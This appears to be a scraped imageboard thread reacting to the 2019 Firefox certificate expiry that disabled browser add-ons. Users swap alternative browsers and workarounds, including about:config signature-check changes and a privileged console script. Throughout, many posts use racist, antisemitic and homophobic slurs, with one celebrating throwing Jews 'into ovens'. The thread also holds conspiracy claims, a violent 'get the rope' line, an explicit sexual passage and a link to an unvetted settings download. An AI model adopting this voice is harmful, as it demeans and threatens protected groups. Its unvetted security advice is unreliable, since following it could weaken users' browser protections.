Mini happening - armagadd-on

Dominic Campbell
Dominic Campbell

Looks like Mozilla allowed some certificate to expire and 50+ million browser installs just had most of their add-ons disabled. Plebs on Twitter and Plebbit are pissed off. Corporate media outlets that use firefox are fucked as well.

twitter.com/hashtag/firefox?f=tweets&vertical=default&lang=en

I'm fucked as well, all my javascript blockers plus rules/settings = disabled, so I can't browse the net like normal. What browsers are you faggots using as alternatives - must have extensive javascript blocking functionality.

Attached: firedoge.png (743.31 KB, 1024x1024)
Attached: firefox.png (678.98 KB, 1026x1226)

Other urls found in this thread:

youtu.be/KaJeAkikuBE?t=132
pando.com/2014/07/16/tor-spooks/
oxwugzccvk3dk6tj.onion/
merriam-webster.com/words-at-play/redundant-is-double-usage
techcrunch.com/2019/05/03/china-smart-city-exposed/
trac.torproject.org/projects/tor/ticket/30388
support.mozilla.org/en-US/kb/install-older-version-of-firefox#w_i-still-want-to-downgrade-ae-where-can-i-get-the-previous-version
files.catbox.moe/i9xkfv.zip
spyware.neocities.org/articles/palemoon.html
spyware.neocities.org/articles/brave.html
blog.mozilla.org/addons/2019/05/04/update-regarding-add-ons-in-firefox/comment-page-3/
blog.mozilla.org/addons/2019/05/04/update-regarding-add-ons-in-firefox/
gab.com/gab/posts/aVlWeEtNUWQ0eldjYlcwamNkSC9LUT09
twitter.com/getongab/status/1124752172258697216
github.com/Eloston/ungoogled-chromium
ungoogled-software.github.io/ungoogled-chromium-binaries/
intellihub.com/mozilla-joins-george-soross-efforts-in-launching-a-strike-against-fake-news/
spyware.neocities.org/articles/iridium.html
github.com/iridium-browser/tracker/wiki/Differences-between-Iridium-and-Chromium
github.com/seebye/ueberzug
addons.mozilla.org/en-US/firefox/addon/absolute-enable-right-click/

Jeremiah Perez
Jeremiah Perez

How (((convenient))) for those who are thwarted by adblockers.

Bentley Bennett
Bentley Bennett

What browsers are you faggots using as alternatives - must have extensive javascript blocking functionality.
I'm using the Linux version of Firefox and everything is working just fine. Try not being a WincuckTM.

Kayden Martin
Kayden Martin

You think it might be a trial balloon? Damn near every site links back to google or has the faceberg pixel trackers now, they could be running a test to get a proxy estimate to see how much data is being lost due to blockers.

Henry Perry
Henry Perry

I run debian on my other rigs, but this is my main rig and none of my engineering software works on linux.

Nolan Price
Nolan Price

In a virtual machine, with a VPN, I run Vivaldi with aggressive blocking on uMatrix. Javascript is only run on a case by case basis, all cookies blocked no remote images, css etc.

Adam White
Adam White

It killed addons for tor browser as well. Noscript just stopped working mid session. Fucking kikes.

Noah Gonzalez
Noah Gonzalez

USE ICECAT (LINUX ONLY), PALEMOON (DE-JEWED FIREFOX; NO MICROPHONE SADLY), OR BRAVE (DE-JEWED CHROMIUM; CAN USE TOR)

Jack Butler
Jack Butler

I run debian on my other rigs, but this is my main rig and none of my engineering software works on linux.
I'm running Xubuntu. I'm not a softwarefag so all I need is spreadsheets and internet.

Zachary Lopez
Zachary Lopez

USE ICECAT (LINUX ONLY), PALEMOON (DE-JEWED FIREFOX; NO MICROPHONE SADLY), OR BRAVE (DE-JEWED CHROMIUM; CAN USE TOR)
Stop trying to test for bots you fucking schizophrenic. People aren't replying because you look like a nut.

Dominic Kelly
Dominic Kelly

Unfortunately, I'm a winpleb for now since this computer was a gift. I don't have the money to build my own rig just yet, otherwise I'd be running something else. Still took every measure possible to override the OS and make microshit hate me.

Attached: B0J9TbgCIAMlFEx.jpg (79.31 KB, 599x1062)

Leo Campbell
Leo Campbell

Mini happening. Dont even start with that shit nigger.

Cooper Torres
Cooper Torres

(YOU)

Aiden Davis
Aiden Davis

(((YOU)))

Camden Nelson
Camden Nelson

The bot test guy was doing that on old threads, and funny enough, people did start talking in them while ignoring the fact that it had been bumped from the abyss. It wouldn't surprise me if many posts here are bots, especially the generic "watcha slider moshe" that appear near the top of new threads.

Cameron Murphy
Cameron Murphy

Yandex.

Carson Stewart
Carson Stewart

jesus, I forgot how fucking horrendous the internet is with javascript enabled.

Blake Jones
Blake Jones

I'm running a 2GB, 1.9 GHZ craptop. No Intel though, and no Wincuck. Feels goed!!!

Bentley Collins
Bentley Collins

about:config
xpinstall.signatures.required: false

Wyatt Nelson
Wyatt Nelson

The proper way to test for them is to reply to them but substitute alphabet characters with other symbols. E.g.:
u r [email protected]
y w0uld [email protected] [email protected] [email protected]
That can't process it logically so it doesn't compute as a reply.

Daniel Bailey
Daniel Bailey

Only works on the dev versions like nightly

Nathan Mitchell
Nathan Mitchell

That's a different type of test. See if you were making a bot to just derail interesting topics, you'd only run the bot in the most recent n <= 20 threads. If old threads suddenly came to life after being bumped the bots might engage them. It's hard to tell though, because normal posters might see an interesting topic, ignore the date, and start responding.

Nolan Gomez
Nolan Gomez

uwu

Attached: ClipboardImage.png (15.09 KB, 603x104)

Isaiah Nelson
Isaiah Nelson

Workaround:
Go to about:debugging
Click "Load Temporary Add-on"

Navigate to:
C:\Users\{your username}\AppData\Roaming\Mozilla\Firefox\Profiles\{profile id}.default\extensions

Each .xpi is an add-on, you can select each one then get rid of any you don't want after.

Lincoln Hernandez
Lincoln Hernandez

It's hard to tell though, because normal posters might see an interesting topic, ignore the date, and start responding.
That's the catch. Plus everyone here is austistic.

Thomas Cruz
Thomas Cruz

Why is a multi-million dollar tech company tweeting in the vernacular of a grade schooler?

Thomas Martinez
Thomas Martinez

I can just load up a vm with a dev or nightly version then migrate over my profile until this shit gets fixed.

Chase Edwards
Chase Edwards

Careful user, I thought the same thing and got hit. I run other browsers too though so it's no big deal.

Ryan Scott
Ryan Scott

Why is a multi-million dollar tech company tweeting in the vernacular of a grade schooler?
They hire SJW wahmen and nigrars.

Jace Perez
Jace Perez

i use waterfox
how do i know if this is happeneing with me?
all my addons are working, blocking

Brayden Ward
Brayden Ward

clown world honk honk

Caleb Powell
Caleb Powell

OMG like so ironic nerd speex uguyzXDDDDDDD

:O

Lincoln Green
Lincoln Green

one user has said it hit his waterfox, mine was still safe last I checked, but I haven't dared open it

Bentley Jackson
Bentley Jackson

set browser update to manual
too lazy to update the browser when it begs you to do so
be saved from faulty updates
Woah

Attached: 15565111111.jpg (170.15 KB, 1024x678)

Isaiah Baker
Isaiah Baker

Well if it hit tor, it'll hit you eventually I believe.

Nolan Flores
Nolan Flores

Yeah, I disabled automatic updates when I first installed. Didn't even know there was a habbening until I saw this thread.

Ayden Brooks
Ayden Brooks

unironically using Mozilla Firefox
not Cyberfox
C'mon now it's like you like being watched by jews or some shit.

Attached: jashin-questioning.png (480.7 KB, 499x673)
Attached: akko-using-both-of-her-INT-points.jpg (76.19 KB, 288x402)
Attached: 257f7561927029042c86a145b60ea45d9bc8461b4b9830e036dbe5729af0ab15.png (236.81 KB, 620x640)
Attached: thinking-tomato.gif (377.72 KB, 500x402)

Hudson Smith
Hudson Smith

I take it you grabbed it from a computer show? They used to have those near me, but stopped some years back.

Nathan Parker
Nathan Parker

POZ oppresses their faculties.

Grayson Flores
Grayson Flores

It works on the normal versions of linux, android and possibly macos too.

Parker Davis
Parker Davis

Use ungoogled-chromium.
How (((curious))) that nobody had answered to this post. It's sad and certainly guarantees grave alert.
You can change the OS, etc. The computer is yours now.

Kevin Gonzalez
Kevin Gonzalez

Just use cURL.

Asher Morales
Asher Morales

same, I don't know how I ever got by without being able to block all this bullshit.

Attached: 6a460276b93a5a7fc956e0905c6f4142b737ac2fd2d4f9ce8a42476dc05235e5.png (218.2 KB, 575x347)

Eli Kelly
Eli Kelly

using Firefox
a browser so pozzed that it rivals chrome
reminder that IE was massively shilled against because you could make all (((advertisment))) gone in under half a dozen clicks.

Zachary Peterson
Zachary Peterson

How exactly is it pozzed? I run a full set of extensions to block everything. Even the fucking TOR client is firefox based. I'll be tossing kikes into ovens in hell before I ever use anything jewgle or kikesoft puts out.

Jacob Allen
Jacob Allen

I haven't used firefox in years but WTF is this nigger-baby talk shit? Seriously, who the fuck approved this tweet?! Good to know, next time my fortune 500 company shit the bed hardcore, I'll just tweet, "Soooowy :O i made a oopsy-doopsy boom-boom in mah die-pee. squeeze meeeeeee lololol"
LITERAL CANCER!
Reminds me of boomer-Gavin roasting Bill Maher:
youtu.be/KaJeAkikuBE?t=132

Attached: 1553400895684.jpg (108.66 KB, 640x706)

John Howard
John Howard

Hopefully people will take that tweet as a sign to immediately abandon Firefox. Because you can bet that lack of professionalism exists all across the board, and it may as well signal that using Firefox is a security risk.

Camden Wright
Camden Wright

NOW HOW DID FIREFOX GET SO CENTRALIZED SO AS TO AFFECT 50 MILLION + PEOPLE?
THEY TRACKING ME?

Bentley Hall
Bentley Hall

Saw the actual tweet by the way and it's not any more reassuring.

Angel Hall
Angel Hall

Nah, I bought it from some guy in my neighborhood. $200.

Grayson Jones
Grayson Jones

They did some kind of "add-on" signing shit last year. Everyone warned them that centralizing the signing of add-ons would fuck up massively. Less than a year later - boom, everything fucks up massively.

Joseph Morales
Joseph Morales

i am using an old addon that works 100x better and htey dont even have it on firefox anymore except for a new version and i couldn tget an old version
so is my waterfox not affected?

Colton Stewart
Colton Stewart

khazar milker posting
her eyes are incredibly assymetrical. those fucking jugs though

Attached: foolishboyim.png (83.29 KB, 342x400)
Attached: 1d7f9dcdd136914041f8fdd44483c35c137da41a499ec902690ccd8e333d8249.png (320.92 KB, 819x593)
Attached: AYY-LMAO.png (148.11 KB, 280x314)
Attached: reeeee.png (57.68 KB, 778x512)

Julian Lewis
Julian Lewis

I guess so, maybe your shit is too old to auto-update. They disabled the ability to turn off auto-updates in the newer versions. So you might be fine for the time being.

Ayden Brown
Ayden Brown

Use ungoogled-(((chromium))).
no

Tyler Gonzalez
Tyler Gonzalez

why do you keep being evasive with your answers
im not going to use that bullshit if you think i am fuck you. anything that forces me to be in a beta w10 program. like you keep and every other answer on here i have asked keeps on insisting.

no waterfox is up to date. i have old addons and i dont know what the fuck your even talking about. I USE WATERFOX
W A T E R
fucking nigger

Oliver Cook
Oliver Cook

Everything that (((spies))) on you disabled at compile time, etc. And on OpenBSD it's safer than anything else thanks to pledge and unveil.

Jackson White
Jackson White

I'm not being evasive, I SIMPLY DON'T KNOW you stupid fuck. I never used waterfox in my entire life. You have fucking idea how many spin off browser use firefox as the base? You know how fucking pozzed the entire web is? Eat shit nigger.

Carson Hall
Carson Hall

This.

Ayden Perez
Ayden Perez

haha sowwy ur about to hemorrhage millions of users uwu lol XD

Attached: fdb523993e547898baf346a5de43e3ce2fc78257be650ded5402a37c69098320.png (33.06 KB, 688x750)

Henry Taylor
Henry Taylor

Wasn't there a post on Zig Forums a few hours ago threatening glow-in-the-darks with a cyber attack?

Nathan Long
Nathan Long

oh fug

Easton Wilson
Easton Wilson

Yeah, my first thought was that this could be related? I'm not so sure though because this just sounds like a fuck up on firefox's part

Benjamin Gomez
Benjamin Gomez

Nope get lost fag

Christopher Clark
Christopher Clark

If some user found away to expire certs at will, it would essentially disable all internet based commerce for years.

Austin Perez
Austin Perez

on my two laptops I run trincertAP6.4 with a bootable virtual drive, and use Cleardream to browse the web

Carson Evans
Carson Evans

Nope, admins would just start spoofing them, like Mexican trash.

Asher Scott
Asher Scott

2rding for palemoon. Apart from the dejeweydness, my favorite >feature is that they stick with a generally static UI, no moving shit around and making changes just to add flashy effects, though it is fully customizable, and changes generally don't break shit. Plus, it has great performance overall

Zachary Jones
Zachary Jones

First day here?

Hudson Watson
Hudson Watson

I'm tech retarded, tell me, is such a thing even conceivably possible?

Attached: 1413231469437.jpg (107.15 KB, 500x497)

Aaron Phillips
Aaron Phillips

Use Brave

It's based and redpilled and fucks over (((ad))) shekels.

Cameron Gomez
Cameron Gomez

Possibly.

Dylan Jones
Dylan Jones

He posted at about 7:09 EST saying it would happen in 2 hours (9pm EST). Are we in for a wild ride?

Joshua Roberts
Joshua Roberts

It's also a tracked browser made by crypto kikes.

Thomas Hernandez
Thomas Hernandez

I hope so.

Connor Howard
Connor Howard

How (((curious))) that nobody had answered to this post. It's sad and certainly guarantees grave alert.

This might turn Javascript on inside Tor and that's exactly how they caught a number of cheese pizza traders.

MANUALLY VERIFY JAVASCRIPT IS DISABLED

Dominic Brooks
Dominic Brooks

prove that brendan eich is a crypto kike
prove its a tracked browser
protip: you cant

Camden Morris
Camden Morris

Here's the hot and dirty fix for all you twinks that missed it
This little episode really makes me wonder, is Tor browser really pinging the mozilla add-on servers so frequently that this happened almost instantaneously? And is it doing so through nodes or over clearnet? Regardless it seems like a security risk to me.

Julian Brown
Julian Brown

LOL IVE ALREADY TOLD YOU STUPID FUCKING FAGGOTS. USE BRAVE OR TOR OR GET THE FUCK OFF. MOZILLA SUCKS OFF CHINA

Oliver Ross
Oliver Ross

Weeab's should kill themselves

Ryder Foster
Ryder Foster

use vivaldi

Nicholas Richardson
Nicholas Richardson

Brave is full of crapware integrating their shady payment system. Of course everything sucks though, so it may be one of the better pieces of shit.

Nolan Campbell
Nolan Campbell

Did anybody archive that thread?

Thomas Johnson
Thomas Johnson

No, but I saved this, juuuuuuuust in case.

Attached: what-are-you-gonna-do.png (4.85 KB, 534x66)

Kayden Garcia
Kayden Garcia

"""""TOR"""""
Literally funded by the US govt

Attached: firefox-rxvVWIWdIr.png (25.61 KB, 635x186)

Julian Stewart
Julian Stewart

Off yourself cartoonposter

Jason Smith
Jason Smith

"But the German exposé showed Tor providing the opposite of anonymity: it singled out users for total NSA surveillance, potentially sucking up and recording everything they did online."
pando.com/2014/07/16/tor-spooks/
Hahahaah torfags btfo

Brayden Hughes
Brayden Hughes

hwhat do you have to be afraid of?

Attached: hwat.png (926.45 KB, 1280x800)

Nathaniel Sanders
Nathaniel Sanders

(1)
This is a thread about firefox shitting the bed.
This is not a thread about faggots who get triggered by chinese cartoons.

Attached: 210052.gif (1.23 MB, 480x270)

Easton Gonzalez
Easton Gonzalez

Still entirely open source
ARE YOU A BAD ENOUGH DUDE TO AUDIT TOR?

Landon Miller
Landon Miller

Attached: faggot.jpg (221.84 KB, 2381x635)

Anthony Clark
Anthony Clark

You update firefox? lol

Adrian Barnes
Adrian Barnes

high-level computer skills
I mean, that just sounds like a LARP. Hilarious if true.

Alexander Rodriguez
Alexander Rodriguez

I was hoping our lives would be rendered obsolete hours ago but it looks like I'm going to have to make breakfest in the morning.

Kayden Miller
Kayden Miller

Linux user here. Everything works like charm here.

Logan Young
Logan Young

that doesn't accomplish anything. The add-ons aren't usable

Benjamin Barnes
Benjamin Barnes

just embrace the horror you faggots. internet explorzor on windows 10 balls deep

Attached: internetExplorer.PNG (204.83 KB, 915x654)

Ian Phillips
Ian Phillips

Once they refresh the cert and I'm willing to bet they will everything will go back to normal. Worst case, use Brave. It might be shitty datamine garbage but it's the closest thing you're going to get to online privacy. Literally the only addon affected for me on Tor was noscript and I have javascript manually disabled anyway so what the fuck do I care?

Jackson Morales
Jackson Morales

Just checked my normal firefox and none of the addons are disabled there. Literally nothing.

Nathan Brooks
Nathan Brooks

man_swims_in_septic_tank.mp4

Levi Bailey
Levi Bailey

Serves you right, you trusted furfags

Brody Lee
Brody Lee

sometimes I fire up the ole tor browser on my win10 just to fuck with them

Lincoln Butler
Lincoln Butler

also try midori and lynx.

Benjamin Smith
Benjamin Smith

COME TO /g/ FOR QUALITY TECHNOLOGY DISCUSSION GUYS

8ch.net/g/

Attached: KILL-MOZILLA-SCUM.png (1.11 MB, 1280x720)

Ayden Wilson
Ayden Wilson

Irrelevant as long as they monitor all of the major exit nodes, they can find you via statistical analysis.

Elijah Ross
Elijah Ross

I just got done poking around some of my regular sites like zerohedge etc. The internet without ad blocking / javascript blocking is the most cancerous shit I have even seen. I've been running blockers for nearly 2 decades and I've never experienced the web without them. The entire web needs to be burned to the ground as it exists now.

Chase Brown
Chase Brown

dissident insurgents get the rope

Hunter Cook
Hunter Cook

using mozilla
It's like dealing with sick masochists.

Attached: 5900b79d2d4.jpg (31.49 KB, 385x391)

Brandon Collins
Brandon Collins

Homosexual party drugs such as amyl nitrate(poppers) and crystal meth both cause brain damage and destroy your immune system. see

Ethan Sanders
Ethan Sanders

Irrelevant as long as they monitor all of the major exit nodes, they can find you via statistical analysis.
All of the major exit nodes they CAN control…
<What is torrc
<What is 'StrictNodes 1'
<What is 'ExcludeNodes {us},{de},{mx},{fr},{se},{lv},{lr},{nl},{ca},{gb}'
And timing attacks are possible, but you have to be dummy to provably get caught up in one.

Kayden Stewart
Kayden Stewart

oh it couldn't be the mass amount of toxins entering their body cavity via fissures in the smooth muscle of heir colon. yea its ridiculous

Ian Allen
Ian Allen

95% of people are dummies sweetie

Connor Myers
Connor Myers

this bullshit was left up

Elijah Wood
Elijah Wood

Noscript on Tor is affected by this as well.

Michael Clark
Michael Clark

Yeah, hitting up about:config and setting javascript.enabled to false should be the first thing anyone does when venturing into tor.

And that flock creates a nice amount of white noise. Dont diss the white noise, it makes finding signals harder for them.

They also usefully double as canaries when they get nabbed.

Alexander Wood
Alexander Wood

my browser extensions go down mid session and now outside my house is a police van in the dark w headlights off

inb4 coincidence

Grayson Hall
Grayson Hall

t. Leftist scum
Fuck off back to Reddit

Attached: 1550016134179.png (1.11 MB, 2580x2009)

Lincoln Thompson
Lincoln Thompson

Like others have mentioned, take a look for ungoogled-chromium. I can't live without at least access to NoScript, so I switched right away.

Attached: 1439396703516.jpg (44.51 KB, 300x450)

Aaron Smith
Aaron Smith

They fucked around with something a while ago breaking a bunch of addons. Last one that worked with DownloadHelper (which lets you save streams) was 25.6.
Of course all the shittiest sites will now say browser is not supported.

Blake Williams
Blake Williams

you sure its not associated with the poz blitzkrieg of all things tech?

Christian Sanchez
Christian Sanchez

Its 2019 and tech companies think this is somehow an acceptable way of communicating anything

Even on pol nobody is retarded enough to type like that.

Zachary Reed
Zachary Reed

The tech industry employs furfag diversity hires and they're the most incompetent out there.

Camden Scott
Camden Scott

and low IQ Indian faggots on H-2B visas

Jordan Smith
Jordan Smith

billiant

Blake Morgan
Blake Morgan

I am using waterfox which says no script is not supported in that 10.x version but it works.

Bentley Robinson
Bentley Robinson

It's a fake tweet you morons. Holy shit how dumb is everyone ITT?

Sebastian Gray
Sebastian Gray

Even if it wasn't, what does it matter what they post on fucking social media. Only red flag would be if they'd post openly anti-White stuff.
Hell, if I was on the PR/CM job I'd write like that all the time to mock people and piss them off.

Carson Thomas
Carson Thomas

Source? Because archives show this normal versions.

Attached: 2019-05-04-11-09-51-Window.png (41 KB, 623x385)

Parker Price
Parker Price

Mine just took a shit 30 min ago . Wait for it. I'm so sick of Mozilla's shit. Shit.

Ayden Powell
Ayden Powell

Sabotage to turn people off Firefox

Bentley Ramirez
Bentley Ramirez

Firefox is SJW shit. Take a look at Gab's Twatter where some admins at Mozilla are mocking Gab for not appreciating their extensions being banned.

Dylan Ortiz
Dylan Ortiz

They nuked everyone’s add ons and now the Firefoxersare switching to opera.

Daniel Bailey
Daniel Bailey

there is literally no difference in the text of his tweet

Charles Evans
Charles Evans

Which explains why they're not tweeting how to workaround the problem, or offering a temporary patch immediately. If people figure out how to what add-on signing means and how to disable it, they can install add-ons Mozilla want to ban like dissenter.

Adrian Taylor
Adrian Taylor

Exactly. Chromium based browsers have an 80% market share. Half of the programs on an average user's computer are made in Electron, which is Chromium. Google has Internet standards by their balls.

:^)

Jaxson Stewart
Jaxson Stewart

actual working temp fix here for anyone who cares:

Paste this in the browser console with ctrl+shift+j (if you can't, set devtools.chrome.enabled to enable in about:config)

This needs to be applied once at least 24 hours until Mozilla fixes this I guess

// Re-enable all extensions

async function set_addons_as_signed() {
Components.utils.import("resource://gre/modules/addons/XPIDatabase.jsm");
Components.utils.import("resource://gre/modules/AddonManager.jsm");
let addons = await XPIDatabase.getAddonList(a => true);

for (let addon of addons) {
// The add-on might have vanished, we'll catch that on the next startup
if (!addon._sourceBundle.exists())
continue;

if( addon.signedState != AddonManager.SIGNEDSTATE_UNKNOWN )
continue;

addon.signedState = AddonManager.SIGNEDSTATE_NOT_REQUIRED;
AddonManagerPrivate.callAddonListeners("onPropertyChanged",
addon.wrapper,
["signedState"]);

await XPIDatabase.updateAddonDisabledState(addon);

}
XPIDatabase.saveChanges();
}

set_addons_as_signed();

Jacob Brooks
Jacob Brooks

this code makes an API call to the NSA. dont do it

Xavier Hughes
Xavier Hughes

No, it doesn't.

Austin Wood
Austin Wood

that quick fix worked, backed up all my ublock settings that took forever to customize

Landon Brooks
Landon Brooks

if it worked then why does it say right here in my dossier that you have been watching futa porn since you were 8

Bentley Hill
Bentley Hill

I had to look that shit up. The fact you even know what "futa" is some next level degeneracy. When I was 8 the internet didn't even exist faggot.

futanari
Also known as "futa" for short, is Japanese for hermaphrodite (-ism), or having the genitalia from both genders.
''''
Commonly found today in hentai (anime porn), or in the "3DX" community on the internet (a community that puts original or existing 3D characters in sexual situations. They're commonly known for making 3D futa characters or futa versions of existing characters from video games), the characters are normally depicted as a humanoid female with both a penis and a vagina, while most of the time having penis lengths in the 12-18 inch range and a 2-3-1/2 inch girth (considered normal for a futa), or bigger with an equine variant, and excessive seminal output anywhere from pints to gallons.
''''
Futas may be drawn with or without testicles, as it's merely just an aesthetic preference between artists and doesn't change what the characters are.
''''
Futas are herms, but often gets confused with shemales/dickgirls/traps, because so much emphasis is put on them using their penises for acts, and rarely have any visual representation or interaction of their vaginas.
''''
Such characters are usually seen as a loophole among straight males for watching girl-on-girl action, while having a real, fully-functional penis attached to one of them and not an actual male figure.
Imagine the sensation futanari characters get in a threesome - banging a female in her vagina, while being banged by another person in theirs…

Nicholas Scott
Nicholas Scott

Working, thanks user.

Charles Nguyen
Charles Nguyen

np user, I saw it posted on twatter. I backed everything up just as a precaution.

Austin Ward
Austin Ward

nu-Zig Forums
run by newfags
not surprised

Cameron Parker
Cameron Parker

The fact you even know what a homo is some next level degeneracy
nice baits and poor sentence structure faggot

Jacob Brooks
Jacob Brooks

What browsers are you faggots using

ATM? Palemoon. I have a few backup ones.

Jeremiah Foster
Jeremiah Foster

Hidden services are a thing, friend.

oxwugzccvk3dk6tj.onion/

Nolan Allen
Nolan Allen

Just missed an is. And you're still a degenerate faggot for even knowing what "futa" means.

merriam-webster.com/words-at-play/redundant-is-double-usage

Eli Rodriguez
Eli Rodriguez

What's a certificate anyway, who issues it and why

Leo Hill
Leo Hill

debian is kinda shit, i use solus and its been amazing

Xavier Rogers
Xavier Rogers

is it actually a firefoxhole ?

Attached: a52c.jpg (19.41 KB, 400x400)

Jacob Hernandez
Jacob Hernandez

What browsers are you faggots using as alternatives
Just download Firefox dev build and edit a line through about:config and presto! Solved.
Google it up too lazy to write step by step instructions.

Landon Rivera
Landon Rivera

I haven't noticed anything different.
Oh, wait. I don't have automatic updates turned on. That would be stupid.

Colton Mitchell
Colton Mitchell

It's easy enough:
Type about:config into address bar and enter
OK that warning off
Search for xpinstall.signatures.required
Right click entry and toggle it to false if true
All Mozilla has to do is patch Firefox temporarily so all versions don't ignore that setting.

Landon Evans
Landon Evans

Then don't use Firefox, they totally whored themselves out to "the resistance" years ago when they chased their CEO out for having a political opinion that didn't confirm.

Nolan Reed
Nolan Reed

I installed a different adblocker. Which solved the ad issue…

Owen Gomez
Owen Gomez

You got that wrong. How convenient for those who are thwarted by (((adblockers)))

Ryder Davis
Ryder Davis

Firefox needs to die, anyway. They chased out their CEO because he donated to California's traditional marriage campaign. If you use Firefox, you may as well just put a dick in your mouth, cuz you're a faggot loving piece of fag shit.

Kayden Davis
Kayden Davis

You can try various browsers

Personally I recommend Vivaldi because of tab groups and you can save all tabs like it was favorites and you can open it in future if you feel like.

William Ortiz
William Ortiz

Fuck this board is one of the few things that really make me laugh hard in this world.

Andrew Kelly
Andrew Kelly

This is how I live my entire life. If shit isn't broken I don't update it. All my addons work btw.

Joshua Young
Joshua Young

Checked. It's just another example of how infantilized everyone is. It's also trying to act childish and "cute" rather than act like an adult and admit they fucked up bad. Most of these fags running the shit show are rainbow haired, horn rimmed glasses SJW fucks.

Jason Ward
Jason Ward

I use Waterfox. My addons did not get disabled, but I heard other people using Waterfox DID have addons get disabled. So I looked into it and found my signature requirement for addons was already disabled.

1. Enter this line into the address field:

2. Search for this setting:
xpinstall.signatures.required

3. Change it to false

As an aside, the new Waterfox logo is shit.

Attached: Waterfox-New-Logo-2019.png (70.21 KB, 351x283)

Adrian Powell
Adrian Powell

Replying to everyone
Nu prefix
no fun allowed
Completely losing the plot
If you hate this place so much just leave.
Oh wait, you're here forever.
What a shame.

Attached: I-can-tell-by-the-pixels.jpg (9.96 KB, 252x200)

Nathan Jackson
Nathan Jackson

This is not a valid excuse

Easton Campbell
Easton Campbell

It was an extremely gay and worthless OP with zero credibility.

Luke Watson
Luke Watson

this happened at about 9 pm last night, 2 hours after the user on here was predicting "chaos" within 2 hours, something about the NSA and CIA in the OP.

Nathan Robinson
Nathan Robinson

A lot of add-ons are active for me. But it's conveniently all the ones dealing with ad-blocking, security or blocking of any sort in general, that don't work. Oy vey.

Ryan Moore
Ryan Moore

I'm running my dick across your mom's tonsils while banging out this post on my fuckedfox browser.

God damn! I didn't know I was going to wake up this morning and be this fucking funny.

Austin Cox
Austin Cox

All that has to be done is go to the about:debugging page and temporarily relouad the extensions. However, I'm still mystified what the dependency was (I haven't look into it). Shouldn't the extensions on my local and their usage be independent from what's out there?

Landon Sanders
Landon Sanders

don't forget to change this again once they resolved the issue.

Ian Robinson
Ian Robinson

I just turned off automatic updates when i saw this yesterday and today my addons don't work. lmao and now i have to see this faggot shit.

fuckfox is pozzed, im swapping to icecat, fuck these niggers

Attached: gay-faggo-tshit.png (175.65 KB, 800x369)

Wyatt Adams
Wyatt Adams

Use Brave browser. I've been using it for over a year and it's been nearly flawless. It blocks ads, doesn't track your internet activity, and isn't one of the (((popular browsers))). Use it with DuckDuckGo search engine and you're more unplugged from Google than 99% of people.

Also use a VPN, this should be standard at this point because of society's hysteria with anything non-pozzed and tracking of people for no reason. NordVPN is great, but there are a ton of good ones. Just be sure to read their policies on maintaining "logs" before you sign up.

Isaiah Gonzalez
Isaiah Gonzalez

use an israeli search engine
Wow I can't imagine jews doing anything underhanded or deceptive.

Isaac Collins
Isaac Collins

In the same vein ..we can look forward to N.America & Europe covered with the smart grid CCTV cameras date being mined by facial recognition AI databases …the glowniggers are fucking high over this…techcrunch.com/2019/05/03/china-smart-city-exposed/

Wyatt Bennett
Wyatt Bennett

I think that "bug" is deliberately aimed at Tor users. I don't even want to know how many people have been compromised before they noticed something's wrong.

HERE IS A SOLUTION

Until this can be fixed properly, here is a temporary workaround for Tor Browser:

Open about:config
Toggle the value of xpinstall.signatures.required so it becomes false.
Restart the browser.

Note that this problem affects one of the bundled add-ons; NoScript is disabled by this bug.

source:
trac.torproject.org/projects/tor/ticket/30388

Adam Rivera
Adam Rivera

uninstall/reinstall and get your addons from github to work.

Kevin Hughes
Kevin Hughes

Also don't forget to do

and set "xpinstall.signatures.required" to false.

Ryder Ramirez
Ryder Ramirez

signatures.required only works on the nightly versions though. This should work on all:

Workaround:

Go to about:debugging

Click "Load Temporary Add-on"

Navigate to:

C:\Users\{your username}\AppData\Roaming\Mozilla\Firefox\Profiles\{profile id}.default\extensions

Each .xpi is an add-on, you can select each one then get rid of any you don't want after.

Jonathan Baker
Jonathan Baker

beep boop techno nigger

Joseph Richardson
Joseph Richardson

STOP SCROLLING, THIS IS THE ANSWER TO END THE BROWSER (((BOTNET))) NIGHTMARE

Browser guide

Download Firefox 61.0.2 (the latest version that is safe)
support.mozilla.org/en-US/kb/install-older-version-of-firefox#w_i-still-want-to-downgrade-ae-where-can-i-get-the-previous-version
Download this Firefox Settings & Extensions.zip
files.catbox.moe/i9xkfv.zip
Disconnect from the Internet
Install Firefox
Open it once, then close it
Go to %appdata%Mozilla\Firefox\Profiles
Go into the profile folder (will look like XXXXXXXX.default)
Delete everything
Paste user.js into the profile folder
Open Firefox
Drag umatrix.xpi to Firefox window and install
Drag smarthttps.xpi to Firefox window and install
Click uMatrix icon, go to the dashboard
Restore from file… , choose my-umatrix-backup.txt
Reconnect to the Internet

You can now use Firefox without it constantly spying on you.
If a website is not functioning correctly then look at uMatrix. Find a guide on how to use it.

Also, if anyone wants help with any aspect of opsec let me know.

Attached: GOD-DAMN-IT-YOU-PAY-ATTENTION-TO-THIS-POST.gif (12.74 KB, 257x257)

Gabriel Kelly
Gabriel Kelly

use palemoon instead.

Gabriel Mitchell
Gabriel Mitchell

By default, Pale Moon is spyware.
spyware.neocities.org/articles/palemoon.html

Ryan Bailey
Ryan Bailey

the nightmare isn't going to end until we die, frend.

Josiah Baker
Josiah Baker

After following the mitigation guide, this software is Not Spyware.
And that guide just basically tells you to change the homepage and disable a few lines in the about:config page such as geolocation, but those come bundled in regular firefox as well.

Jose Gray
Jose Gray

Install linux on a USB and boot from it.
If you plan on building a pc this is something you should learn how to do.
Partition your drive for Windows gaming and linux everything else.
Also install windows from and .iso on a USB and buy a key on Ebay for $3.

Aiden Jenkins
Aiden Jenkins

Attached: 1412892566009.jpg (75.77 KB, 500x500)

Colton Allen
Colton Allen

Yeah, I bounce between Waterfox and Palemoon.
My addons are not disabled.

Attached: 3554yt5rty64735y6u76867896.png (285.46 KB, 760x756)

James Garcia
James Garcia

I recommend starting with Debian. It's not trendy, but it's reliable. Like the guy below mentioned, install it on a USB stick. Take some time to familiarize yourself with the unix command line and find a desktop enviroment that you like. Cinnamon is good for starters.
As for the command line, there's a bunch of books that explain what the specific commands do. Internet articles are helpful as well. Good luck user!

linux
I'd just like to interject for a moment. What you're referring to as Linux,
is in fact, GNU/Linux, or as I've recently taken to calling it, GNU plus Linux.
Linux is not an operating system unto itself, but rather another free component
of a fully functioning GNU system made useful by the GNU corelibs, shell
utilities and vital system components comprising a full OS as defined by POSIX.
Many computer users run a modified version of the GNU system every day,
without realizing it. Through a peculiar turn of events, the version of GNU
which is widely used today is often called "Linux", and many of its users are
not aware that it is basically the GNU system, developed by the GNU Project.
